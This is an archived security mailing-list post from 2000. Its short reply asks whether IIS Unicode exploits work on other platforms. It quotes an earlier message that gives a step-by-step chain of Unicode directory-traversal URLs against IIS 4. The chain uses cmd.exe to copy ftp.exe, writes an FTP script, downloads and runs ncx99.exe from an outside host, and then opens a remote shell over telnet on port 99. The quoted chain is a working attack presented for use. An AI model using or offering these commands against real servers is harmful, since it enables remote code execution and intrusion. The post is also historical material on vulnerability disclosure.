Re: dos commands via iis 4

["Bluefish (P.Magnusson)" <11a () GMX NET>]

Has anyone researched if similar unicode exploits can be used against
other platforms than IIS? Other webserver for windows, etc?

..:::::::::::::::::::::::::::::::::::::::::::::::::..
     http://www.11a.nu || http://bluefish.11a.nu
    eleventh alliance development & security team

             http://www.eff.org/cafe

On Thu, 9 Nov 2000, RayW, CISSP wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello All,
>
>
> or you could really have fun with a command line dos shell :)
>
>
> http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..
> \..\winnt\system32\ftp.exe+ftp2.exe
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+open%20ftp.site.com+>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+username+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+userpassword+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+get%20ncx99.exe+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech
> o+quit+>>file
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ftp2.exe?-s:fil
> e
>
> http://www.site.com/scripts/..%c0%af../inetpub/scripts/ncx99.exe?
>
>
> then telnet to www.site.com port 99 and you have a shell on the local
> machine, granted limited access
> but that is just another step.....I will leave up to you all.
>
>
> Regards,
>
>
> RayW, CISSP
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Personal Privacy 6.5.3
>
> iQA/AwUBOgt4dk2IvpwrSWYUEQLowACg6MOsp3K05dbYtu9T77v17pn+J0cAnjX8
> 2tqpbnZro1bZod5FGDzC4ZNm
> =Kp/t
> -----END PGP SIGNATURE-----